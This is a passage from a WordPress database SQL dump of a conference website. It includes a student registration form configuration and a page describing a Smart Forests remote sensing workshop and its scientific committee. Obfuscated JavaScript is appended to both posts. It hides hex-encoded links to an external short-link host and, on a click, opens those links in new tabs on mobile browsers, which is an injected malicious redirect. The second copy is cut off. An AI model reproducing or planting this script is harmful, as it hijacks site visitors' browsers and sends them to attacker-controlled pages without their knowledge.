ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"School/University\",\"description\":\"\",\"field_name\":\"input_box_1623075254142\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"yes\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"}],[{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Grade/Percentage\",\"description\":\"\",\"field_name\":\"input_box_1623054140\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Grade/Percentage\",\"description\":\"\",\"field_name\":\"input_box_1623075240823\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"yes\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Grade/Percentage\",\"description\":\"\",\"field_name\":\"input_box_1623075256147\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"yes\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"}]],[[]],[[{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Mother\'s Name\",\"description\":\"\",\"field_name\":\"input_box_1623052350\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Father\'s Name\",\"description\":\"\",\"field_name\":\"input_box_1623053158710\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"textarea\",\"general_setting\":{\"label\":\"Address\",\"description\":\"\",\"field_name\":\"textarea_1623052454\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-textarea\"}],[{\"field_key\":\"email\",\"general_setting\":{\"label\":\"Mother\'s email address\",\"description\":\"\",\"field_name\":\"email_1623052525\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-email-secondary\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Mother\'s Profession\",\"description\":\"\",\"field_name\":\"input_box_1623052381811\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"email\",\"general_setting\":{\"label\":\"Father\'s email address\",\"description\":\"\",\"field_name\":\"email_1623052798021\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-email-secondary\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Father\'s Profession\",\"description\":\"\",\"field_name\":\"input_box_1623053192355\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"}]],[[{\"field_key\":\"checkbox\",\"general_setting\":{\"label\":\"Hobbies\",\"description\":\"\",\"field_name\":\"check_box_1623078065\",\"options\":[\"Drawing\",\"Singing\",\"Dancing\",\"Sketching\",\"Other\"],\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"choice_limit\":\"\",\"select_all\":\"no\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\",\"choices\":\"Drawing,Singing,Dancing,Sketching,Other\"},\"icon\":\"ur-icon ur-icon-input-checkbox\"},{\"field_key\":\"privacy_policy\",\"general_setting\":{\"label\":\"Declaration\",\"description\":\"I hereby declare that the above information is true and correct.\",\"field_name\":\"privacy_policy_1623078743\",\"required\":\"yes\",\"hide_label\":\"no\"},\"advance_setting\":{\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-doc\"}]]]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ICFSRM 2022 Conference is \" Climate change, challenges and threats \"','','publish','closed','closed','','student-registration','','','2022-11-12 14:46:02','2022-11-12 14:46:02','',0,'https://gsw2023.com/?post_type=user_registration&p=3321',0,'user_registration','',0),
(3323,1,'2022-11-19 17:08:30','2022-11-19 17:08:30','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3050\" img_size=\"450*300\"][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2></h2>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\n<li><strong>Automation and real-time system operations</strong></li>\n<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing technologies</strong></li>\n<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\n<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\n<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: </u></strong></h5>\n<ul>\n<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\n<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Francesco Pirotti, <a href=\"https://scholar.google.fi/citations?view_op=view_org&amp;hl=en&amp;org=17347040822771261636\">University of Padova</a>, Italy</strong></li>\n<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\n<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\n<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\n<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\n<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\n<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\n<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\n<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\n<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f